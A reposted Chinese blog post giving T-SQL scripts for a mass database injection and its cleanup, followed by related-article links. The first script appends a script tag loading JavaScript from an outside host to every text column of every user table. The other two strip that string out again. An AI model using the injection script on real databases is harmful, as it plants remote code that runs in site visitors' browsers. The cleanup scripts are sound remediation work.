关于数据库批量注入,及批量清除的方法[原创]
来源:互联网 发布:smarty二维数组遍历 编辑:程序博客网 时间:2024/05/01 02:38
以下代码为我幸苦所得,如需转载请保留原出处
首发 www.yangxiaoyong.com 杨小勇
--批量注入字符串
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,
b.name
from sysobjects a,
syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,['
+ @C + ']))+''<script src=http://www.nmidahena.com/1.js></script>''' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
--批量清除字符串(针对nvarchar,ntext均非常有效)
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,
b.name
from sysobjects a,
syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=replace(cast(['+@C+'] as varchar(8000)),''<script src=http://www.nmidahena.com/1.js></script>'',''成功'')' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
--批量清除字符串(对于nvarchar有限,对于ntext无效)
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,
b.name
from sysobjects a,
syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=replace(['+@C+'],''<script src=http://www.nmidahena.com/1.js></script>'',''成功'')' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
http://www.yangxiaoyong.com/article.asp?id=11
- 关于数据库批量注入,及批量清除的方法[原创]
- eclipse中批量清除断点的方法
- SQL 数据库 批量删除 注入的脚本
- 数据库被注入补救方法 批量修改数据库表的值
- sp_MSforeach_Worker 批量清除数据库中被植入的js
- 一个批量处理数组的方法(downmoon原创)
- 【Vegas原创】Oracle批量create、Lock user的方法
- 【Vegas原创】Oracle批量create、Lock user的方法
- 如何批量 删除/添加 数据库中被注入的代码?
- 关于Android的批量插入的方法
- 批量插入数据库的小方法
- OracleBulkCopy 批量插入oracle数据库的方法
- 数据库中批量插入数据的方法
- 数据库被批量注入解决办法(SQL语句)
- 数据库被批量注入了 JS脚本
- 请教各位高手!关于.txt的批量文本导入SQL数据库的实现方法!
- 关于批量导入到数据库
- OleDbCommandBuilder批量更新数据库[Session的应用]
- 在VC中加载LIB文件的几种方法
- Perl在CGI程序设计中常用的函数和指令
- 毕业设计,大虾们帮帮忙啊
- 备份/还原SqlServer数据库(.net版)
- [转]23岁的女人应该知道的
- 关于数据库批量注入,及批量清除的方法[原创]
- 创建自定义事件触发的后台任务样例(转)
- FrameSet 与 IFrame 彻底剖析
- BREW 资源文件编辑器
- 深入GetMessage和PeekMessage
- PHP实用类
- javascript获取frameset中各个模块中的数据
- ASP上传200K限制
- [日期时间]函数(-),计算两个时间之间的秒数